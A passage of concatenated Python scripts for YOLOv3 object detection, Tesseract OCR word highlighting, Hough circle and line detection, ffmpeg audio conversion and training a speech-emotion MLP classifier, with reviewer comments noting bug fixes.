    conv_model.bias.data.copy_(torch.from_numpy(buf[start:start+num_b]))
    start = start + num_b
    conv_model.weight.data.copy_(torch.from_numpy(buf[start:start+num_w]).view_as(conv_model.weight.data))
    start = start + num_w
    return start
def load_conv_bn(buf, start, conv_model, bn_model):
    """Load batch-norm parameters then conv weights from a flat float buffer.

    Buffer layout (darknet order): bn bias, bn weight, bn running_mean,
    bn running_var, conv weight.

    Fix: the original had the `start = ...` updates fused onto the preceding
    lines without a separator, which is a SyntaxError.

    Returns the buffer offset just past the data consumed.
    """
    num_w = conv_model.weight.numel()
    num_b = bn_model.bias.numel()
    bn_model.bias.data.copy_(torch.from_numpy(buf[start:start+num_b]))
    start = start + num_b
    bn_model.weight.data.copy_(torch.from_numpy(buf[start:start+num_b]))
    start = start + num_b
    bn_model.running_mean.copy_(torch.from_numpy(buf[start:start+num_b]))
    start = start + num_b
    bn_model.running_var.copy_(torch.from_numpy(buf[start:start+num_b]))
    start = start + num_b
    conv_model.weight.data.copy_(torch.from_numpy(buf[start:start+num_w]).view_as(conv_model.weight.data))
    start = start + num_w
    return start
import cv2
import numpy as np
import time
# Detection hyper-parameters.
CONFIDENCE = 0.5
SCORE_THRESHOLD = 0.5
IOU_THRESHOLD = 0.5
config_path = "cfg/yolov3.cfg"
weights_path = "weights/yolov3.weights"
font_scale = 1
thickness = 1
# COCO class names and one random colour per class.
LABELS = open("data/coco.names").read().strip().split("\n")
COLORS = np.random.randint(0, 255, size=(len(LABELS), 3), dtype="uint8")
net = cv2.dnn.readNetFromDarknet(config_path, weights_path)
ln = net.getLayerNames()
# NOTE(review): indexing i[0] assumes an OpenCV version where
# getUnconnectedOutLayers() returns 1-element arrays; newer versions return
# plain ints — confirm against the installed cv2.
ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]
# Capture from the default webcam.
cap = cv2.VideoCapture(0)
# Main capture loop: grab a frame, run YOLO, draw detections, display.
while True:
    ret, image = cap.read()
    if not ret:
        # Fix: guard against a failed read (camera gone) instead of
        # crashing on image.shape below.
        break
    h, w = image.shape[:2]
    blob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)
    net.setInput(blob)
    start = time.perf_counter()
    layer_outputs = net.forward(ln)
    time_took = time.perf_counter() - start
    print("Time took:", time_took)
    boxes, confidences, class_ids = [], [], []
    # loop over each of the layer outputs
    for output in layer_outputs:
        # loop over each of the object detections
        for detection in output:
            # extract the class id (label) and confidence (as a probability) of
            # the current object detection
            scores = detection[5:]
            class_id = np.argmax(scores)
            confidence = scores[class_id]
            # discard weak predictions by ensuring the detected
            # probability is greater than the minimum probability
            if confidence > CONFIDENCE:
                # scale the bounding box coordinates back relative to the
                # size of the image, keeping in mind that YOLO actually
                # returns the center (x, y)-coordinates of the bounding
                # box followed by the boxes' width and height
                box = detection[:4] * np.array([w, h, w, h])
                (centerX, centerY, width, height) = box.astype("int")
                # use the center (x, y)-coordinates to derive the top and
                # and left corner of the bounding box
                x = int(centerX - (width / 2))
                y = int(centerY - (height / 2))
                # update our list of bounding box coordinates, confidences,
                # and class IDs
                boxes.append([x, y, int(width), int(height)])
                confidences.append(float(confidence))
                class_ids.append(class_id)
    # perform the non maximum suppression given the scores defined before
    idxs = cv2.dnn.NMSBoxes(boxes, confidences, SCORE_THRESHOLD, IOU_THRESHOLD)
    font_scale = 1
    thickness = 1
    # ensure at least one detection exists
    if len(idxs) > 0:
        # loop over the indexes we are keeping
        for i in idxs.flatten():
            # extract the bounding box coordinates
            x, y = boxes[i][0], boxes[i][1]
            w, h = boxes[i][2], boxes[i][3]
            # Fix: this script defines COLORS/LABELS (uppercase) above; the
            # original referenced undefined lowercase names -> NameError on
            # the first detection.
            color = [int(c) for c in COLORS[class_ids[i]]]
            cv2.rectangle(image, (x, y), (x + w, y + h), color=color, thickness=thickness)
            text = f"{LABELS[class_ids[i]]}: {confidences[i]:.2f}"
            # calculate text width & height to draw the transparent boxes as background of the text
            (text_width, text_height) = cv2.getTextSize(text, cv2.FONT_HERSHEY_SIMPLEX, fontScale=font_scale, thickness=thickness)[0]
            text_offset_x = x
            text_offset_y = y - 5
            box_coords = ((text_offset_x, text_offset_y), (text_offset_x + text_width + 2, text_offset_y - text_height))
            overlay = image.copy()
            cv2.rectangle(overlay, box_coords[0], box_coords[1], color=color, thickness=cv2.FILLED)
            # add opacity (transparency to the box)
            image = cv2.addWeighted(overlay, 0.6, image, 0.4, 0)
            # now put the text (label: confidence %)
            cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,
                        fontScale=font_scale, color=(0, 0, 0), thickness=thickness)
    cv2.imshow("image", image)
    if ord("q") == cv2.waitKey(1):
        break
cap.release()
cv2.destroyAllWindows()
import cv2
import numpy as np
import time
import sys
# Detection hyper-parameters.
CONFIDENCE = 0.5
SCORE_THRESHOLD = 0.5
IOU_THRESHOLD = 0.5
config_path = "cfg/yolov3.cfg"
weights_path = "weights/yolov3.weights"
font_scale = 1
thickness = 1
# COCO class names and one random colour per class.
labels = open("data/coco.names").read().strip().split("\n")
colors = np.random.randint(0, 255, size=(len(labels), 3), dtype="uint8")
net = cv2.dnn.readNetFromDarknet(config_path, weights_path)
ln = net.getLayerNames()
# NOTE(review): indexing i[0] assumes an OpenCV version where
# getUnconnectedOutLayers() returns 1-element arrays — confirm cv2 version.
ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]
# read the file from the command line
video_file = sys.argv[1]
cap = cv2.VideoCapture(video_file)
# Read one frame just to learn the video dimensions for the writer.
_, image = cap.read()
h, w = image.shape[:2]
fourcc = cv2.VideoWriter_fourcc(*"XVID")
out = cv2.VideoWriter("output.avi", fourcc, 20.0, (w, h))
# Main loop: read each frame, run YOLO, draw detections, write and display.
while True:
    ret, image = cap.read()
    if not ret:
        # Fix: the original ignored the read flag, so image becomes None at
        # end-of-video and image.shape raises — stop cleanly instead.
        break
    h, w = image.shape[:2]
    blob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)
    net.setInput(blob)
    start = time.perf_counter()
    layer_outputs = net.forward(ln)
    time_took = time.perf_counter() - start
    print("Time took:", time_took)
    boxes, confidences, class_ids = [], [], []
    # loop over each of the layer outputs
    for output in layer_outputs:
        # loop over each of the object detections
        for detection in output:
            # extract the class id (label) and confidence (as a probability) of
            # the current object detection
            scores = detection[5:]
            class_id = np.argmax(scores)
            confidence = scores[class_id]
            # discard weak predictions by ensuring the detected
            # probability is greater than the minimum probability
            if confidence > CONFIDENCE:
                # scale the bounding box coordinates back relative to the
                # size of the image, keeping in mind that YOLO actually
                # returns the center (x, y)-coordinates of the bounding
                # box followed by the boxes' width and height
                box = detection[:4] * np.array([w, h, w, h])
                (centerX, centerY, width, height) = box.astype("int")
                # use the center (x, y)-coordinates to derive the top and
                # and left corner of the bounding box
                x = int(centerX - (width / 2))
                y = int(centerY - (height / 2))
                # update our list of bounding box coordinates, confidences,
                # and class IDs
                boxes.append([x, y, int(width), int(height)])
                confidences.append(float(confidence))
                class_ids.append(class_id)
    # perform the non maximum suppression given the scores defined before
    idxs = cv2.dnn.NMSBoxes(boxes, confidences, SCORE_THRESHOLD, IOU_THRESHOLD)
    font_scale = 1
    thickness = 1
    # ensure at least one detection exists
    if len(idxs) > 0:
        # loop over the indexes we are keeping
        for i in idxs.flatten():
            # extract the bounding box coordinates
            x, y = boxes[i][0], boxes[i][1]
            w, h = boxes[i][2], boxes[i][3]
            # draw a bounding box rectangle and label on the image
            color = [int(c) for c in colors[class_ids[i]]]
            cv2.rectangle(image, (x, y), (x + w, y + h), color=color, thickness=thickness)
            text = f"{labels[class_ids[i]]}: {confidences[i]:.2f}"
            # calculate text width & height to draw the transparent boxes as background of the text
            (text_width, text_height) = cv2.getTextSize(text, cv2.FONT_HERSHEY_SIMPLEX, fontScale=font_scale, thickness=thickness)[0]
            text_offset_x = x
            text_offset_y = y - 5
            box_coords = ((text_offset_x, text_offset_y), (text_offset_x + text_width + 2, text_offset_y - text_height))
            overlay = image.copy()
            cv2.rectangle(overlay, box_coords[0], box_coords[1], color=color, thickness=cv2.FILLED)
            # add opacity (transparency to the box)
            image = cv2.addWeighted(overlay, 0.6, image, 0.4, 0)
            # now put the text (label: confidence %)
            cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,
                        fontScale=font_scale, color=(0, 0, 0), thickness=thickness)
    out.write(image)
    cv2.imshow("image", image)
    if ord("q") == cv2.waitKey(1):
        break
cap.release()
# Fix: finalize the output container (the original never released the writer,
# which can leave output.avi truncated/unplayable).
out.release()
cv2.destroyAllWindows()
import time
import torch
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as patches
def boxes_iou(box1, box2):
    """Intersection-over-union of two (cx, cy, w, h) centre-format boxes."""
    w1, h1 = box1[2], box1[3]
    w2, h2 = box2[2], box2[3]
    area1 = w1 * h1
    area2 = w2 * h2
    # Extent of the union along each axis: outermost edge to outermost edge.
    union_w = max(box1[0] + w1 / 2.0, box2[0] + w2 / 2.0) - min(box1[0] - w1 / 2.0, box2[0] - w2 / 2.0)
    union_h = max(box1[1] + h1 / 2.0, box2[1] + h2 / 2.0) - min(box1[1] - h1 / 2.0, box2[1] - h2 / 2.0)
    # Overlap along each axis; non-positive means the boxes are disjoint.
    inter_w = w1 + w2 - union_w
    inter_h = h1 + h2 - union_h
    if inter_w <= 0 or inter_h <= 0:
        return 0.0
    inter_area = inter_w * inter_h
    return inter_area / (area1 + area2 - inter_area)
def nms(boxes, iou_thresh):
    """Greedy non-maximal suppression over detection boxes.

    Keeps the highest-confidence box first, then zeroes the confidence
    (element 4) of every remaining box whose IOU with it exceeds
    iou_thresh.  Suppressed boxes are mutated in place, exactly like the
    original implementation.
    """
    # Nothing to suppress.
    if len(boxes) == 0:
        return boxes
    # Gather each box's detection confidence into a tensor.
    det_confs = torch.zeros(len(boxes))
    for idx in range(len(boxes)):
        det_confs[idx] = boxes[idx][4]
    # Indices of the boxes, best confidence first (sorted values discarded).
    _, order = torch.sort(det_confs, descending = True)
    best_boxes = []
    for i in range(len(boxes)):
        candidate = boxes[order[i]]
        # A zeroed confidence means the box was suppressed by an earlier pick.
        if candidate[4] > 0:
            best_boxes.append(candidate)
            # Suppress every lower-ranked box overlapping the pick too much.
            for j in range(i + 1, len(boxes)):
                rival = boxes[order[j]]
                if boxes_iou(candidate, rival) > iou_thresh:
                    rival[4] = 0
    return best_boxes
def detect_objects(model, img, iou_thresh, nms_thresh):
    """
    Run the network on img (an RGB HxWx3 array already resized to the model's
    input size), apply NMS, print timing/count info, and return the kept boxes.
    """
    # Time the whole detection for the report printed below
    start = time.time()
    # Inference mode (disables dropout / batchnorm updates)
    model.eval()
    # HWC uint8 image -> 1x3xHxW float tensor with values scaled to [0, 1]
    tensor = torch.from_numpy(img.transpose(2, 0, 1)).float().div(255.0).unsqueeze(0)
    # The network itself performs the confidence-threshold step of NMS:
    # predictions below nms_thresh are discarded inside the forward pass
    outputs = model(tensor, nms_thresh)
    # Merge the boxes produced at the three YOLO detection scales
    candidates = outputs[0][0] + outputs[1][0] + outputs[2][0]
    # Second NMS step: drop overlapping boxes above the IOU threshold
    kept = nms(candidates, iou_thresh)
    elapsed = time.time() - start
    print('\n\nIt took {:.3f}'.format(elapsed), 'seconds to detect the objects in the image.\n')
    print('Number of Objects Detected:', len(kept), '\n')
    return kept
def load_class_names(namesfile):
    """Read one object-class name per line from namesfile and return them as a list."""
    # Each line of the names file (e.g. coco.names) holds a single class name;
    # strip the trailing newline/whitespace from every entry
    with open(namesfile, 'r') as fp:
        return [line.rstrip() for line in fp]
def print_objects(boxes, class_names):
    """Print a numbered line with class name and confidence for each detection."""
    print('Objects Found and Confidence Level:\n')
    # A full detection carries at least 7 fields:
    # x, y, w, h, det_conf, cls_conf (index 5), cls_id (index 6)
    for idx, box in enumerate(boxes):
        if len(box) >= 7 and class_names:
            print('%i. %s: %f' % (idx + 1, class_names[box[6]], box[5]))
def plot_boxes(img, boxes, class_names, plot_labels, color = None):
    """Draw the given bounding boxes (and optionally class labels) on img,
    save the result to output.jpg and show it with matplotlib.

    boxes entries are normalized (cx, cy, w, h, det_conf[, cls_conf, cls_id]).
    NOTE(review): if plot_labels is True and any box has fewer than 7 fields,
    cls_id/cls_conf are never bound and the label code raises — confirm callers
    always pass full 7-field boxes.
    """
    # Define a tensor used to set the colors of the bounding boxes
    colors = torch.FloatTensor([[1,0,1],[0,0,1],[0,1,1],[0,1,0],[1,1,0],[1,0,0]])
    # Define a function to set the colors of the bounding boxes
    # (interpolates between the 6 anchor colors above for channel c)
    def get_color(c, x, max_val):
        ratio = float(x) / max_val * 5
        i = int(np.floor(ratio))
        j = int(np.ceil(ratio))
        ratio = ratio - i
        r = (1 - ratio) * colors[i][c] + ratio * colors[j][c]
        return int(r * 255)
    # Get the width and height of the image
    width = img.shape[1]
    height = img.shape[0]
    # Create a figure and plot the image
    fig, a = plt.subplots(1,1)
    a.imshow(img)
    # Plot the bounding boxes and corresponding labels on top of the image
    for i in range(len(boxes)):
        # Get the ith bounding box
        box = boxes[i]
        # Get the (x,y) pixel coordinates of the lower-left and lower-right corners
        # of the bounding box relative to the size of the image.
        x1 = int(np.around((box[0] - box[2]/2.0) * width))
        y1 = int(np.around((box[1] - box[3]/2.0) * height))
        x2 = int(np.around((box[0] + box[2]/2.0) * width))
        y2 = int(np.around((box[1] + box[3]/2.0) * height))
        # Set the default rgb value to red
        rgb = (1, 0, 0)
        # Use the same color to plot the bounding boxes of the same object class
        if len(box) >= 7 and class_names:
            cls_conf = box[5]
            cls_id = box[6]
            classes = len(class_names)
            # deterministic per-class color offset (same class -> same color)
            offset = cls_id * 123457 % classes
            red = get_color(2, offset, classes) / 255
            green = get_color(1, offset, classes) / 255
            blue = get_color(0, offset, classes) / 255
            # If a color is given then set rgb to the given color instead
            if color is None:
                rgb = (red, green, blue)
            else:
                rgb = color
        # Calculate the width and height of the bounding box relative to the size of the image.
        width_x = x2 - x1
        width_y = y1 - y2
        # Set the postion and size of the bounding box. (x1, y2) is the pixel coordinate of the
        # lower-left corner of the bounding box relative to the size of the image.
        rect = patches.Rectangle((x1, y2),
                                 width_x, width_y,
                                 linewidth = 2,
                                 edgecolor = rgb,
                                 facecolor = 'none')
        # Draw the bounding box on top of the image
        a.add_patch(rect)
        # If plot_labels = True then plot the corresponding label
        if plot_labels:
            # Create a string with the object class name and the corresponding object class probability
            conf_tx = class_names[cls_id] + ': {:.1f}'.format(cls_conf)
            # Define x and y offsets for the labels
            lxc = (img.shape[1] * 0.266) / 100
            lyc = (img.shape[0] * 1.180) / 100
            # Draw the labels on top of the image
            a.text(x1 + lxc, y1 - lyc, conf_tx, fontsize = 12, color = 'k',
                   bbox = dict(facecolor = rgb, edgecolor = rgb, alpha = 0.6))
    plt.savefig("output.jpg")
    plt.show()
import cv2
import matplotlib.pyplot as plt
from utils import *
from darknet import Darknet
# Set the NMS Threshold
score_threshold = 0.6
# Set the IoU threshold
iou_threshold = 0.4
# Darknet/YOLOv3 configuration, pre-trained weights, and COCO class-name file
cfg_file = "cfg/yolov3.cfg"
weight_file = "weights/yolov3.weights"
namesfile = "data/coco.names"
# Build the network from the config file and load the pre-trained weights
m = Darknet(cfg_file)
m.load_weights(weight_file)
class_names = load_class_names(namesfile)
# m.print_network()
# Load the test image; OpenCV reads BGR, so convert to RGB for the model/plots
original_image = cv2.imread("images/city_scene.jpg")
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
# Resize to the network's expected input resolution
img = cv2.resize(original_image, (m.width, m.height))
# detect the objects
boxes = detect_objects(m, img, iou_threshold, score_threshold)
# Print the first three detections
print(boxes[0])
print(boxes[1])
print(boxes[2])
# plot the image with the bounding boxes and corresponding object class labels
plot_boxes(original_image, boxes, class_names, plot_labels=True)
import cv2
import numpy as np
import time
import sys
import os
# Minimum detection confidence required to keep a raw prediction
CONFIDENCE = 0.5
SCORE_THRESHOLD = 0.5
IOU_THRESHOLD = 0.5
# the neural network configuration
config_path = "cfg/yolov3.cfg"
# the YOLO net weights file
weights_path = "weights/yolov3.weights"
# loading all the class labels (objects)
labels = open("data/coco.names").read().strip().split("\n")
# generating colors for each object for later plotting
colors = np.random.randint(0, 255, size=(len(labels), 3), dtype="uint8")
# load the YOLO network
net = cv2.dnn.readNetFromDarknet(config_path, weights_path)
# path_name = "images/city_scene.jpg"
path_name = sys.argv[1]
image = cv2.imread(path_name)
file_name = os.path.basename(path_name)
# splitext handles file names containing extra dots (the old split(".")
# raised ValueError for e.g. "my.photo.jpg"); ext keeps its leading dot
filename, ext = os.path.splitext(file_name)
h, w = image.shape[:2]
# create 4D blob
blob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)
# sets the blob as the input of the network
net.setInput(blob)
# get all the layer names
ln = net.getLayerNames()
# getUnconnectedOutLayers() returns [[i], ...] in OpenCV <= 4.5.3 but a flat
# [i, ...] array in newer releases; flattening handles both (indices are 1-based)
ln = [ln[int(i) - 1] for i in np.array(net.getUnconnectedOutLayers()).flatten()]
# feed forward (inference) and get the network output
# measure how much it took in seconds
start = time.perf_counter()
layer_outputs = net.forward(ln)
time_took = time.perf_counter() - start
print(f"Time took: {time_took:.2f}s")
boxes, confidences, class_ids = [], [], []
# loop over each of the layer outputs
for output in layer_outputs:
    # loop over each of the object detections
    for detection in output:
        # extract the class id (label) and confidence (as a probability) of
        # the current object detection
        scores = detection[5:]
        class_id = np.argmax(scores)
        confidence = scores[class_id]
        # discard weak predictions by ensuring the detected
        # probability is greater than the minimum probability
        if confidence > CONFIDENCE:
            # scale the bounding box coordinates back relative to the
            # size of the image, keeping in mind that YOLO actually
            # returns the center (x, y)-coordinates of the bounding
            # box followed by the boxes' width and height
            box = detection[:4] * np.array([w, h, w, h])
            (centerX, centerY, width, height) = box.astype("int")
            # use the center (x, y)-coordinates to derive the top and
            # and left corner of the bounding box
            x = int(centerX - (width / 2))
            y = int(centerY - (height / 2))
            # update our list of bounding box coordinates, confidences,
            # and class IDs
            boxes.append([x, y, int(width), int(height)])
            confidences.append(float(confidence))
            class_ids.append(class_id)
# perform the non maximum suppression given the scores defined before
idxs = cv2.dnn.NMSBoxes(boxes, confidences, SCORE_THRESHOLD, IOU_THRESHOLD)
font_scale = 1
thickness = 1
# ensure at least one detection exists
if len(idxs) > 0:
    # loop over the indexes we are keeping; np.array(...).flatten() copes with
    # the different container types NMSBoxes has returned across OpenCV versions
    for i in np.array(idxs).flatten():
        # extract the bounding box coordinates
        x, y = boxes[i][0], boxes[i][1]
        w, h = boxes[i][2], boxes[i][3]
        # draw a bounding box rectangle and label on the image
        color = [int(c) for c in colors[class_ids[i]]]
        cv2.rectangle(image, (x, y), (x + w, y + h), color=color, thickness=thickness)
        text = f"{labels[class_ids[i]]}: {confidences[i]:.2f}"
        # calculate text width & height to draw the transparent boxes as background of the text
        (text_width, text_height) = cv2.getTextSize(text, cv2.FONT_HERSHEY_SIMPLEX, fontScale=font_scale, thickness=thickness)[0]
        text_offset_x = x
        text_offset_y = y - 5
        box_coords = ((text_offset_x, text_offset_y), (text_offset_x + text_width + 2, text_offset_y - text_height))
        overlay = image.copy()
        cv2.rectangle(overlay, box_coords[0], box_coords[1], color=color, thickness=cv2.FILLED)
        # add opacity (transparency to the box)
        image = cv2.addWeighted(overlay, 0.6, image, 0.4, 0)
        # now put the text (label: confidence %)
        cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,
                    fontScale=font_scale, color=(0, 0, 0), thickness=thickness)
# cv2.imshow("image", image)
# if cv2.waitKey(0) == ord("q"):
#     pass
# ext already starts with "." thanks to splitext
cv2.imwrite(filename + "_yolo3" + ext, image)
import pytesseract
import cv2
import sys
import matplotlib.pyplot as plt
from PIL import Image
# read the image using OpenCV (path given as first CLI argument)
image = cv2.imread(sys.argv[1])
# make a copy of this image to draw in
image_copy = image.copy()
# the target word to search for (second CLI argument)
target_word = sys.argv[2]
# get all OCR data (per-word text + geometry) from the image as a dict of lists
data = pytesseract.image_to_data(image, output_type=pytesseract.Output.DICT)
# indices of every recognized word matching the target (case-insensitive)
word_occurences = [ i for i, word in enumerate(data["text"]) if word.lower() == target_word ]
for occ in word_occurences:
    # extract the width, height, top and left position for that detected word
    w = data["width"][occ]
    h = data["height"][occ]
    l = data["left"][occ]
    t = data["top"][occ]
    # define all the surrounding box points (clockwise from top-left)
    p1 = (l, t)
    p2 = (l + w, t)
    p3 = (l + w, t + h)
    p4 = (l, t + h)
    # draw the 4 lines (rectangular)
    image_copy = cv2.line(image_copy, p1, p2, color=(255, 0, 0), thickness=2)
    image_copy = cv2.line(image_copy, p2, p3, color=(255, 0, 0), thickness=2)
    image_copy = cv2.line(image_copy, p3, p4, color=(255, 0, 0), thickness=2)
    image_copy = cv2.line(image_copy, p4, p1, color=(255, 0, 0), thickness=2)
# save and display the annotated image
plt.imsave("all_dog_words.png", image_copy)
plt.imshow(image_copy)
plt.show()
import pytesseract
import cv2
import matplotlib.pyplot as plt
import sys
from PIL import Image
# read the image using OpenCV
# from the command line first argument
image = cv2.imread(sys.argv[1])
# or you can use Pillow
# image = Image.open(sys.argv[1])
# run Tesseract OCR and get the recognized text as a single string
string = pytesseract.image_to_string(image)
# print it
print(string)
# get all data
# data = pytesseract.image_to_data(image)
# print(data)
import pytesseract
import cv2
import matplotlib.pyplot as plt
from PIL import Image
# the target word to search for
target_word = "your"
# open the default webcam
cap = cv2.VideoCapture(0)
while True:
    # read the image from the cam
    _, image = cap.read()
    # make a copy of this image to draw in
    image_copy = image.copy()
    # get all OCR data (per-word text + geometry) from the frame
    data = pytesseract.image_to_data(image, output_type=pytesseract.Output.DICT)
    # print the recognized words
    print(data["text"])
    # indices of every recognized word matching the target (case-insensitive)
    word_occurences = [ i for i, word in enumerate(data["text"]) if word.lower() == target_word ]
    for occ in word_occurences:
        # extract the width, height, top and left position for that detected word
        w = data["width"][occ]
        h = data["height"][occ]
        l = data["left"][occ]
        t = data["top"][occ]
        # define all the surrounding box points
        p1 = (l, t)
        p2 = (l + w, t)
        p3 = (l + w, t + h)
        p4 = (l, t + h)
        # draw the 4 lines (rectangular)
        image_copy = cv2.line(image_copy, p1, p2, color=(255, 0, 0), thickness=2)
        image_copy = cv2.line(image_copy, p2, p3, color=(255, 0, 0), thickness=2)
        image_copy = cv2.line(image_copy, p3, p4, color=(255, 0, 0), thickness=2)
        image_copy = cv2.line(image_copy, p4, p1, color=(255, 0, 0), thickness=2)
    # NOTE(review): the quit check runs before imshow, so the final annotated
    # frame is shown one iteration late — confirm this ordering is intended
    if cv2.waitKey(1) == ord("q"):
        break
    cv2.imshow("image_copy", image_copy)
cap.release()
cv2.destroyAllWindows()
import cv2
import numpy as np
import matplotlib.pyplot as plt
import sys
# load the image
img = cv2.imread(sys.argv[1])
# convert BGR to RGB to be suitable for showing using matplotlib library
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# make a copy of the original image
cimg = img.copy()
# convert image to grayscale
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# apply a blur using the median filter
img = cv2.medianBlur(img, 5)
# finds the circles in the grayscale image using the Hough transform
circles = cv2.HoughCircles(image=img, method=cv2.HOUGH_GRADIENT, dp=0.9,
                           minDist=80, param1=110, param2=39, maxRadius=70)
# HoughCircles returns None when nothing is found — guard against a TypeError
# (and against `co` being unbound in the final print)
co = 0
if circles is not None:
    for co, i in enumerate(circles[0, :], start=1):
        # round to int pixel coordinates: cv2.circle requires integer centers/radii
        x, y, r = int(round(float(i[0]))), int(round(float(i[1]))), int(round(float(i[2])))
        # draw the outer circle in green
        cv2.circle(cimg, (x, y), r, (0, 255, 0), 2)
        # draw the center of the circle in red
        cv2.circle(cimg, (x, y), 2, (0, 0, 255), 3)
# print the number of circles detected
print("Number of circles detected:", co)
# save the image, convert to BGR to save with proper colors
# cv2.imwrite("coins_circles_detected.png", cimg)
# show the image
plt.imshow(cimg)
plt.show()
import numpy as np
import matplotlib.pyplot as plt
import cv2
cap = cv2.VideoCapture(0)
while True:
    _, image = cap.read()
    # convert to grayscale
    grayscale = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    # perform edge detection
    edges = cv2.Canny(grayscale, 30, 100)
    # detect lines in the image using hough lines technique
    lines = cv2.HoughLinesP(edges, 1, np.pi/180, 60, np.array([]), 50, 5)
    # HoughLinesP returns None when no line is found — iterating None raised
    # a TypeError and killed the loop; skip drawing for such frames instead
    if lines is not None:
        # iterate over the output lines and draw them
        for line in lines:
            for x1, y1, x2, y2 in line:
                cv2.line(image, (x1, y1), (x2, y2), (255, 0, 0), 3)
                cv2.line(edges, (x1, y1), (x2, y2), (255, 0, 0), 3)
    # show images
    cv2.imshow("image", image)
    cv2.imshow("edges", edges)
    if cv2.waitKey(1) == ord("q"):
        break
cap.release()
cv2.destroyAllWindows()
import numpy as np
import matplotlib.pyplot as plt
import cv2
import sys
# read the image
image = cv2.imread(sys.argv[1])
# convert to grayscale
grayscale = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# perform edge detection
edges = cv2.Canny(grayscale, 30, 100)
# detect lines in the image using hough lines technique
lines = cv2.HoughLinesP(edges, 1, np.pi/180, 60, np.array([]), 50, 5)
# HoughLinesP returns None when no line is found — iterating None raised a
# TypeError; only draw when something was actually detected
if lines is not None:
    # iterate over the output lines and draw them
    for line in lines:
        for x1, y1, x2, y2 in line:
            cv2.line(image, (x1, y1), (x2, y2), color=(20, 220, 20), thickness=3)
# show the image
plt.imshow(image)
plt.show()
"""
A utility script used for converting audio samples to be
suitable for feature extraction
"""
import os
def convert_audio(audio_path, target_path, remove=False):
    """This function sets the audio audio_path to:
        - 16000Hz Sampling rate
        - one audio channel ( mono )
        Params:
            audio_path (str): the path of audio wav file you want to convert
            target_path (str): target path to save your new converted wav file
            remove (bool): whether to remove the old file after converting
        Note that this function requires ffmpeg installed in your system."""
    import subprocess
    # Run ffmpeg with an argument list and no shell: the previous
    # os.system(f"ffmpeg -i {audio_path} ...") broke on paths containing
    # spaces and allowed shell injection through the file names.
    # check=False mirrors os.system's ignore-the-exit-status behavior.
    subprocess.run(["ffmpeg", "-i", audio_path, "-ac", "1", "-ar", "16000", target_path],
                   check=False)
    if remove:
        os.remove(audio_path)
def convert_audios(path, target_path, remove=False):
    """Convert every wav file under `path` to 16000Hz mono, mirroring the
    directory tree under `target_path`.
    Params:
        path (str): root folder containing the wav files to convert
        target_path (str): root folder where converted files are written
        remove (bool): whether to remove each source file after converting
    Note that this function requires ffmpeg installed in your system."""
    # First pass: recreate the source directory structure under target_path
    for parent, subdirs, _ in os.walk(path):
        for sub in subdirs:
            mirrored = os.path.join(parent, sub).replace(path, target_path)
            if not os.path.isdir(mirrored):
                os.mkdir(mirrored)
    # Second pass: convert each wav file into its mirrored location
    for parent, _, names in os.walk(path):
        for name in names:
            src = os.path.join(parent, name)
            if src.endswith(".wav"):
                convert_audio(src, src.replace(path, target_path), remove=remove)
if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="""Convert ( compress ) wav files to 16MHz and mono audio channel ( 1 channel )
    This utility helps for compressing wav files for training and testing""")
    parser.add_argument("audio_path", help="Folder that contains wav files you want to convert")
    parser.add_argument("target_path", help="Folder to save new wav files")
    parser.add_argument("-r", "--remove", type=bool, help="Whether to remove the old wav file after converting", default=False)
    args = parser.parse_args()
    audio_path = args.audio_path
    target_path = args.target_path
    # A directory argument converts the whole tree; a single .wav converts one file
    if os.path.isdir(audio_path):
        if not os.path.isdir(target_path):
            os.makedirs(target_path)
        convert_audios(audio_path, target_path, remove=args.remove)
    elif os.path.isfile(audio_path) and audio_path.endswith(".wav"):
        # ensure the output path carries the .wav extension
        if not target_path.endswith(".wav"):
            target_path += ".wav"
        convert_audio(audio_path, target_path, remove=args.remove)
    else:
        raise TypeError("The audio_path file you specified isn't appropriate for this operation")
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import accuracy_score
from utils import load_data
import os
import pickle
# load RAVDESS dataset
X_train, X_test, y_train, y_test = load_data(test_size=0.25)
# print some details
# number of samples in training data
print("[+] Number of training samples:", X_train.shape[0])
# number of samples in testing data
print("[+] Number of testing samples:", X_test.shape[0])
# number of features used
# this is a vector of features extracted
# using utils.extract_features() method
print("[+] Number of features:", X_train.shape[1])
# best model, determined by a grid search
model_params = {
    'alpha': 0.01,
    'batch_size': 256,
    'epsilon': 1e-08,
    'hidden_layer_sizes': (300,),
    'learning_rate': 'adaptive',
    'max_iter': 500,
}
# initialize Multi Layer Perceptron classifier
# with best parameters ( so far )
model = MLPClassifier(**model_params)
# train the model
print("[*] Training the model...")
model.fit(X_train, y_train)
# predict 25% of data to measure how good we are
y_pred = model.predict(X_test)
# calculate the accuracy
accuracy = accuracy_score(y_true=y_test, y_pred=y_pred)
print("Accuracy: {:.2f}%".format(accuracy*100))
# now we save the model
# make result directory if doesn't exist yet
if not os.path.isdir("result"):
    os.mkdir("result")
# serialize the trained classifier for later use by the recording script
pickle.dump(model, open("result/mlp_classifier.model", "wb"))
import pyaudio
import os
import wave
import pickle
from sys import byteorder
from array import array
from struct import pack
from sklearn.neural_network import MLPClassifier
from utils import extract_feature
# Minimum absolute sample value treated as "sound"; anything quieter is silence
THRESHOLD = 500
# Number of frames read from the audio stream per iteration
CHUNK_SIZE = 1024
# 16-bit signed integer samples
FORMAT = pyaudio.paInt16
# Sampling rate in Hz
RATE = 16000
# Number of consecutive silent chunks that ends a recording
SILENCE = 30
def is_silent(snd_data):
    """Return True when no sample in snd_data reaches the silence THRESHOLD."""
    peak = max(snd_data)
    return peak < THRESHOLD
